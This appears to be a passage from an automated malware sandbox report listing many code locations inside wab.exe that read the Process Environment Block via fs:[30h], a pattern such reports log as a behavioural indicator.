Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h] 25_2_21F77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h] 25_2_21FF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h] 25_2_21FF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h] 25_2_21FF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF035C mov ecx, dword ptr fs:[00000030h] 25_2_21FF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h] 25_2_21FF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h] 25_2_21FF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69353 mov eax, dword ptr fs:[00000030h] 25_2_21F69353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69353 mov eax, dword ptr fs:[00000030h] 25_2_21F69353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h] 25_2_21FF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220360B8 mov eax, dword ptr fs:[00000030h] 25_2_220360B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220360B8 mov ecx, dword ptr fs:[00000030h] 25_2_220360B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F67330 mov eax, dword ptr fs:[00000030h] 25_2_21F67330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9F32A mov eax, dword ptr fs:[00000030h] 25_2_21F9F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220450D9 mov eax, dword ptr fs:[00000030h] 25_2_220450D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6C310 mov ecx, dword ptr fs:[00000030h] 25_2_21F6C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F90310 mov ecx, dword ptr fs:[00000030h] 25_2_21F90310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h] 25_2_21FAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h] 25_2_21FAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h] 25_2_21FAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h] 25_2_21FF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h] 25_2_21FF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h] 25_2_21FF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F692FF mov eax, dword ptr fs:[00000030h] 25_2_21F692FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22030115 mov eax, dword ptr fs:[00000030h] 25_2_22030115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201A118 mov ecx, dword ptr fs:[00000030h] 25_2_2201A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h] 25_2_2201A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h] 25_2_2201A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h] 25_2_2201A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h] 25_2_21F802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h] 25_2_21F802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h] 25_2_21F802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h] 25_2_21F6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h] 25_2_21F6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h] 25_2_21F6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F792C5 mov eax, dword ptr fs:[00000030h] 25_2_21F792C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F792C5 mov eax, dword ptr fs:[00000030h] 25_2_21F792C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h] 25_2_21F7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h] 25_2_21F7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h] 25_2_21F7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h] 25_2_21F7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h] 25_2_21F7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h] 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF92BC mov eax, dword ptr fs:[00000030h] 25_2_21FF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF92BC mov eax, dword ptr fs:[00000030h] 25_2_21FF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF92BC mov ecx, dword ptr fs:[00000030h] 25_2_21FF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF92BC mov ecx, dword ptr fs:[00000030h] 25_2_21FF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22045152 mov eax, dword ptr fs:[00000030h] 25_2_22045152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F802A0 mov eax, dword ptr fs:[00000030h] 25_2_21F802A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F802A0 mov eax, dword ptr fs:[00000030h] 25_2_21F802A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA329E mov eax, dword ptr fs:[00000030h] 25_2_21FA329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA329E mov eax, dword ptr fs:[00000030h] 25_2_21FA329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22009179 mov eax, dword ptr fs:[00000030h] 25_2_22009179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h] 25_2_21FF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h] 25_2_21FF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h] 25_2_21FF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202C188 mov eax, dword ptr fs:[00000030h] 25_2_2202C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202C188 mov eax, dword ptr fs:[00000030h] 25_2_2202C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB1270 mov eax, dword ptr fs:[00000030h] 25_2_21FB1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB1270 mov eax, dword ptr fs:[00000030h] 25_2_21FB1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F99274 mov eax, dword ptr fs:[00000030h] 25_2_21F99274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h] 25_2_21F74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h] 25_2_21F74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h] 25_2_21F74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6826B mov eax, dword ptr fs:[00000030h] 25_2_21F6826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h] 25_2_220211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h] 25_2_220211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h] 25_2_220211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h] 25_2_220211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6A250 mov eax, dword ptr fs:[00000030h] 25_2_21F6A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F76259 mov eax, dword ptr fs:[00000030h] 25_2_21F76259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69240 mov eax, dword ptr fs:[00000030h] 25_2_21F69240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69240 mov eax, dword ptr fs:[00000030h] 25_2_21F69240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA724D mov eax, dword ptr fs:[00000030h] 25_2_21FA724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220361C3 mov eax, dword ptr fs:[00000030h] 25_2_220361C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220361C3 mov eax, dword ptr fs:[00000030h] 25_2_220361C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6823B mov eax, dword ptr fs:[00000030h] 25_2_21F6823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220451CB mov eax, dword ptr fs:[00000030h] 25_2_220451CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220461E5 mov eax, dword ptr fs:[00000030h] 25_2_220461E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA7208 mov eax, dword ptr fs:[00000030h] 25_2_21FA7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA7208 mov eax, dword ptr fs:[00000030h] 25_2_21FA7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAC5ED mov eax, dword ptr fs:[00000030h] 25_2_21FAC5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAC5ED mov eax, dword ptr fs:[00000030h] 25_2_21FAC5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F725E0 mov eax, dword ptr fs:[00000030h] 25_2_21F725E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F995DA mov eax, dword ptr fs:[00000030h] 25_2_21F995DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F765D0 mov eax, dword ptr fs:[00000030h] 25_2_21F765D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA5D0 mov eax, dword ptr fs:[00000030h] 25_2_21FAA5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA5D0 mov eax, dword ptr fs:[00000030h] 25_2_21FAA5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22045636 mov eax, dword ptr fs:[00000030h] 25_2_22045636
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE5CF mov eax, dword ptr fs:[00000030h] 25_2_21FAE5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE5CF mov eax, dword ptr fs:[00000030h] 25_2_21FAE5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA55C0 mov eax, dword ptr fs:[00000030h] 25_2_21FA55C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F945B1 mov eax, dword ptr fs:[00000030h] 25_2_21F945B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F945B1 mov eax, dword ptr fs:[00000030h] 25_2_21F945B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h] 25_2_21F915A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h] 25_2_21F915A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h] 25_2_21F915A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h] 25_2_21F915A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h] 25_2_21F915A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h] 25_2_21FF05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h] 25_2_21FF05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h] 25_2_21FF05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE59C mov eax, dword ptr fs:[00000030h] 25_2_21FAE59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA4588 mov eax, dword ptr fs:[00000030h] 25_2_21FA4588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F72582 mov eax, dword ptr fs:[00000030h] 25_2_21F72582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F72582 mov ecx, dword ptr fs:[00000030h] 25_2_21F72582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h] 25_2_21F6758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h] 25_2_21F6758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h] 25_2_21F6758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAB570 mov eax, dword ptr fs:[00000030h] 25_2_21FAB570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAB570 mov eax, dword ptr fs:[00000030h] 25_2_21FAB570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h] 25_2_21FA656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h] 25_2_21FA656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h] 25_2_21FA656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B562 mov eax, dword ptr fs:[00000030h] 25_2_21F6B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F78550 mov eax, dword ptr fs:[00000030h] 25_2_21F78550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F78550 mov eax, dword ptr fs:[00000030h] 25_2_21F78550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h] 25_2_21F7D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h] 25_2_21F7D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h] 25_2_21F7D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h] 25_2_21F7D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h] 25_2_21F7D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h] 25_2_21F7D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F6C7 mov eax, dword ptr fs:[00000030h] 25_2_2202F6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h] 25_2_21F9E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h] 25_2_21F9E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h] 25_2_21F9E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h] 25_2_21F9E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h] 25_2_21F9E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAD530 mov eax, dword ptr fs:[00000030h] 25_2_21FAD530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAD530 mov eax, dword ptr fs:[00000030h] 25_2_21FAD530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h] 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h] 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h] 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h] 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h] 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h] 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220316CC mov eax, dword ptr fs:[00000030h] 25_2_220316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220316CC mov eax, dword ptr fs:[00000030h] 25_2_220316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220316CC mov eax, dword ptr fs:[00000030h] 25_2_220316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220316CC mov eax, dword ptr fs:[00000030h] 25_2_220316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202D6F0 mov eax, dword ptr fs:[00000030h] 25_2_2202D6F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA7505 mov eax, dword ptr fs:[00000030h] 25_2_21FA7505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA7505 mov ecx, dword ptr fs:[00000030h] 25_2_21FA7505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F704E5 mov ecx, dword ptr fs:[00000030h] 25_2_21F704E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F72E mov eax, dword ptr fs:[00000030h] 25_2_2202F72E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h] 25_2_2204B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h] 25_2_2204B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h] 25_2_2204B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h] 25_2_2204B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA34B0 mov eax, dword ptr fs:[00000030h] 25_2_21FA34B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA44B0 mov ecx, dword ptr fs:[00000030h] 25_2_21FA44B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22043749 mov eax, dword ptr fs:[00000030h] 25_2_22043749
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F764AB mov eax, dword ptr fs:[00000030h] 25_2_21F764AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F79486 mov eax, dword ptr fs:[00000030h] 25_2_21F79486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F79486 mov eax, dword ptr fs:[00000030h] 25_2_21F79486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B480 mov eax, dword ptr fs:[00000030h] 25_2_21F6B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F78A mov eax, dword ptr fs:[00000030h] 25_2_2202F78A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9A470 mov eax, dword ptr fs:[00000030h] 25_2_21F9A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9A470 mov eax, dword ptr fs:[00000030h] 25_2_21F9A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9A470 mov eax, dword ptr fs:[00000030h] 25_2_21F9A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h] 25_2_21F71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h] 25_2_21F71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h] 25_2_21F71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h] 25_2_21F71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h] 25_2_21F71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9245A mov eax, dword ptr fs:[00000030h] 25_2_21F9245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6645D mov eax, dword ptr fs:[00000030h] 25_2_21F6645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220437B6 mov eax, dword ptr fs:[00000030h] 25_2_220437B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h] 25_2_21F7B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h] 25_2_21F7B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h] 25_2_21F7B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h] 25_2_21F7B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h] 25_2_21F7B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h] 25_2_21F7B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE443 mov eax, dword ptr fs:[00000030h] 25_2_21FAE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA430 mov eax, dword ptr fs:[00000030h] 25_2_21FAA430
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6C427 mov eax, dword ptr fs:[00000030h] 25_2_21F6C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6E420 mov eax, dword ptr fs:[00000030h] 25_2_21F6E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6E420 mov eax, dword ptr fs:[00000030h] 25_2_21F6E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6E420 mov eax, dword ptr fs:[00000030h] 25_2_21F6E420
